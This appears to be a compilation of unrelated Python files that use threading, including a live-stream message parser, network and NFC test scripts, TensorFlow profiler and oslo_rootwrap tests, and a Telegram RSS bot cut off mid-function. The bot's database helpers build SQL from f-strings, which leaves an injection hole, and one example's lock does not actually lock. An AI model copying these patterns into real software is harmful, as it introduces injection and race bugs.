def hot_rank_settlement(data):
"""
进入限时热门榜总榜数据
rank: 排名
name: 榜单名
rankDesc: 榜单简介
icon: 图标
time: 时间
"""
return {
"rank": data["rank"],
"name": data["area_name"],
"rankDesc": data["rank_desc"],
"icon": data["icon"],
"time": data["timestamp"]
}
@staticmethod
def super_msg(data):
"""
SC留言数据
background: SC背景样式
userName: 用户名
level: 用户直播用户等级
userId: 用户id
giftId: 礼物id
giftName: 礼物名称
num: 送礼物数量
medal: 用户粉丝牌子
msg: 内容
price: 价格
time: SC开始显示时间
endTime: SC时长
"""
data, cmd = data["data"], data["cmd"]
return {
"background": {
'background_bottom_color': data["background_bottom_color"],
'background_color': data["background_color"],
'background_color_end': data["background_color_end"],
'background_color_start': data["background_color_start"],
'background_icon': data["background_icon"],
'background_image': data["background_image"],
'background_price_color': data["background_price_color"],
} if cmd != "SUPER_CHAT_MESSAGE_JPN" else {
"background_bottom_color": data["background_bottom_color"],
"background_color": data["background_color"],
'background_color_end': "",
'background_color_start': "",
"background_icon": data["background_icon"],
"background_image": data["background_image"],
"background_price_color": data["background_price_color"]
},
"userName": data["user_info"]["uname"],
"userId": data["uid"],
"level": data["user_info"]["user_level"],
"giftId": data["gift"]["gift_id"],
"giftName": data["gift"]["gift_name"],
"num": data["gift"]["num"],
"medal": data["medal_info"],
"msg": data["message"],
"price": data["price"],
"time": data["start_time"],
"endTime": data["time"]
}
@staticmethod
def my_room_guard_renew(data):
"""
自动续费舰长
userName: 用户名
icon: 图标
msgSelf: 自动续费舰长消息
roomid: 房间号
type: 舰长类型
"""
return {
"userName": data["name"],
"icon": data["side"]["head_icon"],
"msgSelf": data["msg_self"],
"roomid": data["roomid"],
"type": data["msg_type"]
}
@staticmethod
def guard_buy(data):
"""
开通舰长数据
userName: 用户名
userId: 用户id
giftName: 舰长类型
giftId: 礼物id
num: 开通月数?
time: 开始时间
endTime: 结束时间
"""
data = data["data"]
return {
"userName": data["username"],
"userId": data["uid"],
"giftName": data["gift_name"],
"giftId": data["gift_id"],
"num": data["num"],
"time": data["start_time"],
"endTime": data["end_time"]
}
@staticmethod
def anchor_lot_award(data):
"""
天选之人结果数据
name: 天选之人标题
num: 数量
image: 图片?
userList: 中奖用户名单
"""
data = data["data"]
return {
"name": data["award_name"],
"num": data["award_num"],
"image": data["award_image"],
"userList": data["award_users"],
}
class LiveLog(metaclass=ABCMeta):
def __init__(self, save_in="./log"):
self.__terminal = sys.stdout
self.save_in = save_in
self.__save_in_obj = None
self.save_in_load = False
self.lock = Lock()
self.__set_log_path = self.set_log_path()
sys.stdout = self
def __save_in_open(self):
if not os.path.isdir(self.save_in):
os.makedirs(self.save_in)
if not self.save_in_load:
self.__save_in_obj = open(self.__set_log_path, "a", encoding="utf-8")
self.save_in_load = True
def __save_in_close(self):
if self.save_in_load:
self.__save_in_obj.close()
self.save_in_load = False
@abstractmethod
def set_log_path(self):
return time.strftime(f"{self.save_in}/log_%Y_%m_%d_%H_%M_%S.txt", time.localtime())
@abstractmethod
def set_log_style(self, log):
log_time = time.strftime("%H:%M:%S", time.localtime())
log_msg = "[%s] %s" % (log_time, log)
return log_msg
def write(self, log):
self.__save_in_open()
if log == "":
return
self.lock.acquire()
if log != "\n":
log = self.set_log_style(log)
if self.save_in_load:
self.__save_in_obj.write(log)
self.__terminal.write(log)
self.__save_in_close()
self.lock.release()
def flush(self):
self.__terminal.flush()
|
tc_test.py
|
#!/usr/bin/env python
import sys, random, time, string
# overload socket.create_connection
import socket
real_create_conn = socket.create_connection
def set_src_addr(*args):
address, timeout = args[0], args[1]
source_address = ('1.0.0.1', 0)
return real_create_conn(address, timeout, source_address)
socket.create_connection = set_src_addr
import requests
from threading import Thread
client_addr = ('1.0.0.1', 0)
server_addr = ('3.0.0.1', random.randrange(1025,3000))
def client_to_webserver():
print 'starting web test'
for i in xrange(10):
sys.stdout.write('sending request...')
sys.stdout.flush()
start = time.time()
r = requests.get('http://3.0.0.1:8080/vod/1000Seg1-Frag2')
end = time.time()
cl = int(r.headers['content-length'])
print 'BW: %d Kbps' % (int((cl*8 / float(1000)) / (end-start)))
def client_test():
print 'starting direct tc test'
client = socket.socket()
client.bind(client_addr)
client.connect(server_addr)
REQUEST_SIZE = 4096
try:
for i in xrange(10):
start = time.time()
client.sendall(str(REQUEST_SIZE))
resp = client.recv(REQUEST_SIZE+10)
#print 'got back %d bytes' % len(resp)
if len(resp) == 0: break
end = time.time()
print 'BW: %d Kbps' % (int((REQUEST_SIZE*8 / float(1000)) / (end-start)))
finally:
client.close()
def gen_random_string(size):
return ''.join(random.choice(string.ascii_letters + string.digits) for x in range(size))
def server_test():
server = socket.socket()
server.bind(server_addr)
server.listen(5)
data = ''
try:
while True:
try:
(client_socket, client_information) = server.accept()
except:
server.close()
break
# serve this client only until it disconnects
while True:
try:
msg = client_socket.recv(4096)
requested_size = int(msg)
#print 'Returning %i bytes' % requested_size
if len(data) is not requested_size:
data = gen_random_string(requested_size)
client_socket.sendall(data)
except Exception, e:
client_socket.close()
break
break
finally:
server.close()
def local_test():
s_t = Thread(target=server_test)
s_t.start()
time.sleep(1)
c_t = Thread(target=client_test)
c_t.start()
c_t.join()
s_t.join()
def web_test():
client_to_webserver()
local_test()
web_test()
|
Chap10_Example10.31.py
|
from threading import *
class abc:
def __init__(self, seat_available):
self.seat_available = seat_available
self.mylock = Lock()
def abc_reserveseat(self, seat_required):
self.mylock.acquire(blocking=False)
print("Number of seats remaining : ", self.seat_available)
if self.seat_available >= seat_required:
print(f"{current_thread().name} was alloted the seat No. L{self.seat_available}")
self.seat_available = self.seat_available - 1
else:
print("All the seats are booked now Sorry !")
self.mylock.release()
obj_abc = abc(2)
myt1 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Saurabh')
myt2 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Nilesh')
myt3 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Divya')
myt1.start()
myt2.start()
myt3.start()
|
NFCPair1.py
|
# -- coding: utf-8 --
import threading, time, sys
from src.steps.LoginAndLogout import LoginAndLogout
from src.steps.AddWirelessUser import AddWirelessUser
from src.steps.ChangeWifi import ChangeWifi
from src.utils.serport import serport
from src.utils.LogUtil import LogUtil
from src.utils.LogPath import Path
def transferArgv():
if len(sys.argv) < 2:
print("Invalid parameters,please enter 1 parameter!")
exit()
PairTimes = sys.argv[1]
return PairTimes
class NFCPair1:
def __init__(self):
self.Log_file = Path().getLogPath('NFCPair1')
self.NFClog_file = Path().getNFCLogPath('NFC')
LogUtil.log(self.Log_file, "Start NFCPair1 test !!!")
# 教练登陆
LoginAndLogout().loginTrainer()
self.match_state = None
def SaveLog(self):
while serport.is_open:
serport.write(b'\r$EMD9\r')
time.sleep(1)
serport.write(b'\r$EMD4\r')
time.sleep(1)
data = serport.readline()
LogUtil.nfcLog(self.NFClog_file, repr(data))
def NFCPairing(self, pairTimes):
n = 0
for x in range(int(pairTimes)):
AddWirelessUser().clickAdd()
while AddWirelessUser().chooseWirelessMode():
n += 1
LogUtil.log(self.Log_file, "NFC Pairing failed !!! Failed counter: " + str(n))
LogUtil.log(self.Log_file, "NFC Pairing succeed !!! Succeed counter: " + str(x))
LogUtil.log(self.Log_file, "Change wifi id :" + str(x))
ChangeWifi().changeWifi()
serport.close()
def thread(self, pairTimes):
t1 = threading.Thread(target=self.SaveLog)
t1.start()
t2 = threading.Thread(target=self.NFCPairing(pairTimes))
t2.start()
t2.join()
def run(self, pairTimes, times):
self.thread(pairTimes)
if __name__ == "__main__":
NFCPair1().run(1, 0)
# driver.quit()
|
profiler_api_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.x profiler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import threading
import portpicker
from tensorflow.python.distribute import collective_all_reduce_strategy as collective_strategy
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as profiler
from tensorflow.python.profiler.integration_test import mnist_testing_utils
def _model_setup():
"""Set up a MNIST Keras model for testing purposes.
Builds a MNIST Keras model and returns model information.
Returns:
A tuple of (batch_size, steps, train_dataset, mode)
"""
context.set_log_device_placement(True)
batch_size = 64
steps = 2
with collective_strategy.CollectiveAllReduceStrategy().scope():
# TODO(b/142509827): In rare cases this errors out at C++ level with the
# "Connect failed" error message.
train_ds, _ = mnist_testing_utils.mnist_synthetic_dataset(batch_size, steps)
model = mnist_testing_utils.get_mnist_model((28, 28, 1))
return batch_size, steps, train_ds, model
def _make_temp_log_dir(test_obj):
return test_obj.get_temp_dir()
class ProfilerApiTest(test_util.TensorFlowTestCase):
def _check_tools_pb_exist(self, logdir):
expected_files = [
'overview_page.pb',
'input_pipeline.pb',
'tensorflow_stats.pb',
'kernel_stats.pb',
]
for file in expected_files:
path = os.path.join(logdir, 'plugins/profile/*/*{}'.format(file))
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
def test_single_worker_no_profiling(self):
"""Test single worker without profiling."""
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
def test_single_worker_sampling_mode(self):
"""Test single worker sampling mode."""
def on_worker(port):
logging.info('worker starting server on {}'.format(port))
profiler.start_server(port)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
port = portpicker.pick_unused_port()
thread = threading.Thread(target=on_worker, args=(port,))
thread.start()
# Request for 3 seconds of profile.
duration_ms = 3000
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms, '',
3, options)
thread.join(30)
self._check_tools_pb_exist(logdir)
def test_single_worker_programmatic_mode(self):
"""Test single worker programmatic mode."""
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler.start(logdir, options)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
profiler.stop()
self._check_tools_pb_exist(logdir)
if __name__ == '__main__':
multi_process_runner.test_main()
|
PID_reader.py
|
import time
import threading
from random import seed
from random import random
from IPython.display import display
import math
class PID_Tester:
def __init__(self, ui=False, smell_engine=False, PID_MODE=False, cont_read_conc=False,sampling_rate=50):
self.ui = ui
self.smell_engine = smell_engine
self.PID_MODE = PID_MODE
self.smell_engine.smell_controller.valve_driver.PID_MODE = PID_MODE
self.cont_read_conc = cont_read_conc
self.seed = seed(1)
self.sampling_rate = sampling_rate
def read_concentration_values(self):
concentration_mixtures = self.ui.odorConcentrationValues() # Read in user-specified concentrations
print(concentration_mixtures)
self.smell_engine.set_desired_concentrations(concentration_mixtures) # Assign target concentrations
def timer_setup(self, interval=None):
"""
Configuration of thread instance.
Thread runs at a user-defined time interval to which it issues commands to hardware.
Args:
interval (float): Rate at which thread executs write commands to olfactometer.
"""
if interval is None:
try:
interval = (0.5 / self.frames_per_s)
except:
interval = 0.1
self.timer_interval = interval
self.timer_paused = False
self.timer_thread = threading.Thread(target=self.timer_run, args=())
self.timer_thread.daemon = True
def timer_start(self):
"""
Starts thread instance.
"""
print("Thread started")
self.timer_thread.start()
def timer_run(self):
"""
The 'update' method for the thread instance. Writes digital valve states
to olfactometer at the defined timer_interval rate.
If writing values is unsuccessfull thread instance halts.
"""
while self.timer_interval: # While the timer is valid
if not self.timer_paused: # Try and write the data
time.sleep(self.timer_interval)
# IF RUNNING FOR PID TESTS
if (self.PID_MODE):
# if (self.cont_read_conc):
# self.read_concentration_values()
self.ui.timeSeriesUpdate(self.smell_engine.smell_controller.valve_driver.PID_sensor_readings,
10*self.sampling_rate)
# print("Thread running")
else:
time.sleep(self.timer_interval)
def timer_pause(self):
"""
Halts thread instance.
"""
self.timer_paused = True
def timer_resume(self):
"""
Continues thread after being paused.
"""
self.timer_paused = False
def timer_stop(self):
"""
Pauses thread, turns off all valve, ends defined virtual communication,
and releases Task object instance from memory.
"""
self.timer_pause()
|
test_functional.py
|
# Copyright (c) 2014 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import io
import logging
import os
import pwd
import shutil
import signal
import sys
import threading
import time
try:
import eventlet
except ImportError:
eventlet = None
import fixtures
import mock
import six
import testtools
from testtools import content
from oslo_rootwrap import client
from oslo_rootwrap import cmd
from oslo_rootwrap import subprocess
from oslo_rootwrap.tests import run_daemon
class _FunctionalBase(object):
def setUp(self):
super(_FunctionalBase, self).setUp()
tmpdir = self.useFixture(fixtures.TempDir()).path
self.config_file = os.path.join(tmpdir, 'rootwrap.conf')
self.later_cmd = os.path.join(tmpdir, 'later_install_cmd')
filters_dir = os.path.join(tmpdir, 'filters.d')
filters_file = os.path.join(tmpdir, 'filters.d', 'test.filters')
os.mkdir(filters_dir)
with open(self.config_file, 'w') as f:
f.write("""[DEFAULT]
filters_path=%s
daemon_timeout=10
exec_dirs=/bin""" % (filters_dir,))
with open(filters_file, 'w') as f:
f.write("""[Filters]
echo: CommandFilter, /bin/echo, root
cat: CommandFilter, /bin/cat, root
sh: CommandFilter, /bin/sh, root
id: CommandFilter, /usr/bin/id, nobody
unknown_cmd: CommandFilter, /unknown/unknown_cmd, root
later_install_cmd: CommandFilter, %s, root
""" % self.later_cmd)
def _test_run_once(self, expect_byte=True):
code, out, err = self.execute(['echo', 'teststr'])
self.assertEqual(0, code)
if expect_byte:
expect_out = b'teststr\n'
expect_err = b''
else:
expect_out = 'teststr\n'
expect_err = ''
self.assertEqual(expect_out, out)
self.assertEqual(expect_err, err)
def _test_run_with_stdin(self, expect_byte=True):
code, out, err = self.execute(['cat'], stdin=b'teststr')
self.assertEqual(0, code)
if expect_byte:
expect_out = b'teststr'
expect_err = b''
else:
expect_out = 'teststr'
expect_err = ''
self.assertEqual(expect_out, out)
self.assertEqual(expect_err, err)
def test_run_command_not_found(self):
code, out, err = self.execute(['unknown_cmd'])
self.assertEqual(cmd.RC_NOEXECFOUND, code)
def test_run_unauthorized_command(self):
code, out, err = self.execute(['unauthorized_cmd'])
self.assertEqual(cmd.RC_UNAUTHORIZED, code)
def test_run_as(self):
if os.getuid() != 0:
self.skip('Test requires root (for setuid)')
# Should run as 'nobody'
code, out, err = self.execute(['id', '-u'])
self.assertEqual('%s\n' % pwd.getpwnam('nobody').pw_uid, out)
# Should run as 'root'
code, out, err = self.execute(['sh', '-c', 'id -u'])
self.assertEqual('0\n', out)
class RootwrapTest(_FunctionalBase, testtools.TestCase):
def setUp(self):
super(RootwrapTest, self).setUp()
self.cmd = [
sys.executable, '-c',
'from oslo_rootwrap import cmd; cmd.main()',
self.config_file]
def execute(self, cmd, stdin=None):
proc = subprocess.Popen(
self.cmd + cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
out, err = proc.communicate(stdin)
self.addDetail('stdout',
content.text_content(out.decode('utf-8', 'replace')))
self.addDetail('stderr',
content.text_content(err.decode('utf-8', 'replace')))
return proc.returncode, out, err
def test_run_once(self):
self._test_run_once(expect_byte=True)
def test_run_with_stdin(self):
self._test_run_with_stdin(expect_byte=True)
class RootwrapDaemonTest(_FunctionalBase, testtools.TestCase):
def assert_unpatched(self):
# We need to verify that these tests are run without eventlet patching
if eventlet and eventlet.patcher.is_monkey_patched('socket'):
self.fail("Standard library should not be patched by eventlet"
" for this test")
def setUp(self):
self.assert_unpatched()
super(RootwrapDaemonTest, self).setUp()
# Collect daemon logs
daemon_log = io.BytesIO()
p = mock.patch('oslo_rootwrap.subprocess.Popen',
run_daemon.forwarding_popen(daemon_log))
p.start()
self.addCleanup(p.stop)
# Collect client logs
client_log = six.StringIO()
handler = logging.StreamHandler(client_log)
log_format = run_daemon.log_format.replace('+', ' ')
handler.setFormatter(logging.Formatter(log_format))
logger = logging.getLogger('oslo_rootwrap')
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
self.addCleanup(logger.removeHandler, handler)
# Add all logs as details
@self.addCleanup
def add_logs():
self.addDetail('daemon_log', content.Content(
content.UTF8_TEXT,
lambda: [daemon_log.getvalue()]))
self.addDetail('client_log', content.Content(
content.UTF8_TEXT,
lambda: [client_log.getvalue().encode('utf-8')]))
# Create client
self.client = client.Client([
sys.executable, run_daemon.__file__,
self.config_file])
# _finalize is set during Client.execute()
@self.addCleanup
def finalize_client():
if self.client._initialized:
self.client._finalize()
self.execute = self.client.execute
def test_run_once(self):
self._test_run_once(expect_byte=False)
def test_run_with_stdin(self):
self._test_run_with_stdin(expect_byte=False)
def test_run_with_later_install_cmd(self):
code, out, err = self.execute(['later_install_cmd'])
self.assertEqual(cmd.RC_NOEXECFOUND, code)
# Install cmd and try again
shutil.copy('/bin/echo', self.later_cmd)
code, out, err = self.execute(['later_install_cmd'])
# Expect successfully run the cmd
self.assertEqual(0, code)
def test_daemon_ressurection(self):
# Let the client start a daemon
self.execute(['cat'])
# Make daemon go away
os.kill(self.client._process.pid, signal.SIGTERM)
# Expect client to successfully restart daemon and run simple request
self.test_run_once()
def test_daemon_timeout(self):
# Let the client start a daemon
self.execute(['echo'])
# Make daemon timeout
with mock.patch.object(self.client, '_restart') as restart:
time.sleep(15)
self.execute(['echo'])
restart.assert_called_once()
def _exec_thread(self, fifo_path):
try:
# Run a shell script that signals calling process through FIFO and
# then hangs around for 1 sec
self._thread_res = self.execute([
'sh', '-c', 'echo > "%s"; sleep 1; echo OK' % fifo_path])
except Exception as e:
self._thread_res = e
def test_graceful_death(self):
# Create a fifo in a temporary dir
tmpdir = self.useFixture(fixtures.TempDir()).path
fifo_path = os.path.join(tmpdir, 'fifo')
os.mkfifo(fifo_path)
# Start daemon
self.execute(['cat'])
# Begin executing shell script
t = threading.Thread(target=self._exec_thread, args=(fifo_path,))
t.start()
# Wait for shell script to actually start
with open(fifo_path) as f:
f.readline()
# Gracefully kill daemon process
os.kill(self.client._process.pid, signal.SIGTERM)
# Expect daemon to wait for our request to finish
t.join()
if isinstance(self._thread_res, Exception):
raise self._thread_res # Python 3 will even provide nice traceback
code, out, err = self._thread_res
self.assertEqual(0, code)
self.assertEqual('OK\n', out)
self.assertEqual('', err)
@contextlib.contextmanager
def _test_daemon_cleanup(self):
# Start a daemon
self.execute(['cat'])
socket_path = self.client._manager._address
# Stop it one way or another
yield
process = self.client._process
stop = threading.Event()
# Start background thread that would kill process in 1 second if it
# doesn't die by then
def sleep_kill():
stop.wait(1)
if not stop.is_set():
os.kill(process.pid, signal.SIGKILL)
threading.Thread(target=sleep_kill).start()
# Wait for process to finish one way or another
self.client._process.wait()
# Notify background thread that process is dead (no need to kill it)
stop.set()
# Fail if the process got killed by the background thread
self.assertNotEqual(-signal.SIGKILL, process.returncode,
"Server haven't stopped in one second")
# Verify that socket is deleted
self.assertFalse(os.path.exists(socket_path),
"Server didn't remove its temporary directory")
def test_daemon_cleanup_client(self):
# Run _test_daemon_cleanup stopping daemon as Client instance would
# normally do
with self._test_daemon_cleanup():
self.client._finalize()
def test_daemon_cleanup_signal(self):
# Run _test_daemon_cleanup stopping daemon with SIGTERM signal
with self._test_daemon_cleanup():
os.kill(self.client._process.pid, signal.SIGTERM)
|
_threading_local.py
|
"""Thread-local objects
(Note that this module provides a Python version of thread
threading.local class. Depending on the version of Python you're
using, there may be a faster one available. You should always import
the local class from threading.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = mydata.__dict__.items()
... items.sort()
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
# Threading import is at end
class _localbase(object):
__slots__ = '_local__key', '_local__args', '_local__lock'
def __new__(cls, *args, **kw):
self = object.__new__(cls)
key = '_local__key', 'thread.local.' + str(id(self))
object.__setattr__(self, '_local__key', key)
object.__setattr__(self, '_local__args', (args, kw))
object.__setattr__(self, '_local__lock', RLock())
if args or kw and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
# We need to create the thread dict in anticipation of
# __init__ being called, to make sire we don't cal it
# again ourselves.
dict = object.__getattribute__(self, '__dict__')
currentThread().__dict__[key] = dict
return self
def _patch(self):
key = object.__getattribute__(self, '_local__key')
d = currentThread().__dict__.get(key)
if d is None:
d = {}
currentThread().__dict__[key] = d
object.__setattr__(self, '__dict__', d)
# we have a new instance dict, so call out __init__ if we have
# one
cls = type(self)
if cls.__init__ is not object.__init__:
args, kw = object.__getattribute__(self, '_local__args')
cls.__init__(self, *args, **kw)
else:
object.__setattr__(self, '__dict__', d)
class local(_localbase):
def __getattribute__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__getattribute__(self, name)
finally:
lock.release()
def __setattr__(self, name, value):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__setattr__(self, name, value)
finally:
lock.release()
def __delattr__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__delattr__(self, name)
finally:
lock.release()
def __del__():
threading_enumerate = enumerate
__getattribute__ = object.__getattribute__
def __del__(self):
key = __getattribute__(self, '_local__key')
try:
threads = list(threading_enumerate())
except:
# if enumerate fails, as it seems to do during
# shutdown, we'll skip cleanup under the assumption
# that there is nothing to clean up
return
for thread in threads:
try:
__dict__ = thread.__dict__
except AttributeError:
# Thread is dying, rest in peace
continue
if key in __dict__:
try:
del __dict__[key]
except KeyError:
pass # didn't have anything in this thread
return __del__
__del__ = __del__()
from threading import currentThread, enumerate, RLock
|
main.py
|
import telebot
import os
import re
import threading
import feedparser
import sqlite3
import time
from config import TOKEN, super_users
from make_db import tablesName
bot = telebot.TeleBot(TOKEN)
bot_id = bot.get_me().id
bot_username = '@'+bot.get_me().username
url = "https://aosus.org/latest.rss"
sleep = 15
# التحقق من وجود قاعدة البيانات
if os.path.lexists("./db.sqlite3"):
coon = sqlite3.connect('./db.sqlite3', check_same_thread=False)
cursor = coon.cursor()
lock = threading.Lock()
else:
print("make database first form 'make_db.py'")
quit()
if os.path.lexists("./last_id.txt"):
pass
else:
with open('./last_id.txt','w+') as f:
pass
def insert(table_name:str, args_:tuple):
""" ادخال البيانات داخل قاعدة البيانات
المتغيرات:
table_name (str): اسم الجدول المراد ادخال البيانات فيه
args_ (tuple): القيم التي سوف تملي بها الاعمدة الخاصة بالجدول
"""
try:
lock.acquire(True)
args = tuple(map(str, args_))
first_element = f"('{args[0]}')"
cursor.execute(f"INSERT INTO {table_name} ({','.join(tablesName[table_name])}) VALUES {tuple(args) if len(args) > 1 else first_element}")
coon.commit()
finally:
lock.release()
def get_column(table_name:str, column:str):
""" ترجع لك جميع القيم التي في العامود المعطى
المتغيرات:
table_name (str): اسم الجدول اذي يوجد فيه العامود
column (str): اسم العامود الذي تريد اسخراج جميع القيم التي به
المخرجات:
list: قائمة من عناصر العامود
"""
try:
lock.acquire(True)
cursor.execute(f"SELECT {column} FROM {table_name}")
return [val for table in cursor.fetchall() for val in table]
finally:
lock.release()
def del_row(table_name:str, column:str, value:str):
""" حذف صف من قاعدة البيانات
المتغيرات:
table_name (str): اسم الجدول الذي يوجد به العامود
column (str): اسم العامود الذي يوجد به الصف
value (str): القيمة التي تريد مسحها الموجودة في العامود
"""
try:
lock.acquire(True)
cursor.execute(f"DELETE FROM {table_name} WHERE {column}='{value}'")
coon.commit()
finally:
lock.release()
def update(table_name:str, column:str, new_value:str, where_column:str, where_value:str) -> None:
""" تعديل صف في قاعدة البيانات
المتغيرات:
table_name (str): اسم الجدول.
column (str): العمود الذي تريد تحديثه.
new_value (str): القيمة الجديدة.
where_column (str): where_value العمود الذي يوجد به.
where_value (str): where_column القيمة الموجودة في.
"""
try:
lock.acquire(True)
cursor.execute(f"UPDATE {table_name} SET '{column}'= '{new_value}' WHERE {where_column} = '{where_value}'")
coon.commit()
finally:
lock.release()
def row(table_name:str, column:str, word:str, want='*', lst=True):
""" جلب صف من قاعدة البيانات
المتغيرات:
table_name (str): اسم الجدول الذي يوجد به العمود
column (str): اسم العمود اذي يوجد به الصف
word (str): القيمة الموجود في العمود
want (str, optional): word العمود الذي تريده من الصف الذي يوجد به العمود الي قيمته. Defaults to '*'.
lst (bool, optional): اخراج المعطيات كلستة ام تيبل. Defaults to 'True'.
المخرجات:
[list,tuple,str,None]: قائمة بالنتائج او عنصر او لاشي اذ لم تكن هناك نتائج
"""
try:
lock.acquire(True)
cursor.execute(f"SELECT {want} FROM {table_name} WHERE {column}='{word}'")
if lst:
result = list(map(
lambda val: str(val).replace('<br>', '\n'),
[val for t in cursor.fetchall() for val in t]
))
else:
result = list(map(
lambda t: tuple(str(val) for val in t),
[t for t in cursor.fetchall()]
))
if lst:
if (len(result) == 0):
return None
elif (len(result) == 1):
return result[0] if lst else result[0][0]
else:
pass # سوف يتم تنفيد اخخر سطر وارجاع النتائج كلها
else:
pass # سوف يتم تنفيد اخخر سطر وارجاع النتائج كلها
return result
finally:
lock.release()
def get_latest_news():
""" https://aosus.org/latest ارجاع اخر موضوع من
المخرجات:
dict: تفاصيل اخر موضوع
"""
return feedparser.parse(url).entries[0]
def get_last_id():
""" ارجاع ايدي اخر موضوع تم ارساله
المخرجات:
str: ايدي اخر موضوع تم ارساله
"""
with open('./last_id.txt','r') as f:
last_id = f.read()
return last_id
def add_id(news_id:str):
""" './last_id.txt' اضافة ايدي اخر منشور هنا
المتغيرات:
news_id (str): ايدي الموضوع الجديد
"""
with open('./last_id.txt', 'w') as f:
f.write(news_id)
def get_is_admin(chat_id:int, user_id:int):
""" ارجاع اذا كان الشخص ادمن في المحادثة
المتغيرات:
chat_id (int): ايدي الرسالة
user_id (int): ايدي الشخص
المخرجات:
bool: user id admin in chat_id
"""
# اذا كان ايدي المحادثة هو ايدي الشخص
# هذا يعني ان المحادثة خاصة
if chat_id == user_id:
# ارجاع صحيح لان الشخص ادمن في محادثته
return True
else:
# وظيفة الماب هي ارجاع ايديات مشرفين المحادثة
return user_id in map(lambda user: user.user.id, bot.get_chat_administrators(chat_id))
def convert_status(chat_id:int, new_status:str, msg_id:int = None):
""" حذف او اضافة العضو الى قاعدة البيانات
المتغيرات:
chat_id (int): ايدي الشخص المراد حذفه او اضافته
new_status (str): الحالة الجديدة (on, off)
msg_id (int, optional): ايدي الرسالة للرد عليها. Defaults to None.
"""
status = 'on' if str(chat_id) in get_column('chats', 'id') else 'off'
if status == new_status:
bot.send_message(chat_id, "هذه هي حالة البوت في هذه المحادثة بالفعل",
reply_to_message_id=msg_id)
else:
if new_status == 'on':
bot.send_message(chat_id, "تم تفعيل الاشتراك", reply_to_message_id=msg_id)
insert('chats', (chat_id,))
else:
bot.send_message(chat_id, "تم الغاء تفعيل الاشتراك", reply_to_message_id=msg_id)
del_row('chats', 'id', str(chat_id))
def cleanhtml(raw_html:str):
""" html تنظيف النص من تاقات ال
المتغيرات:
raw_html (str): html نص ال
Returns:
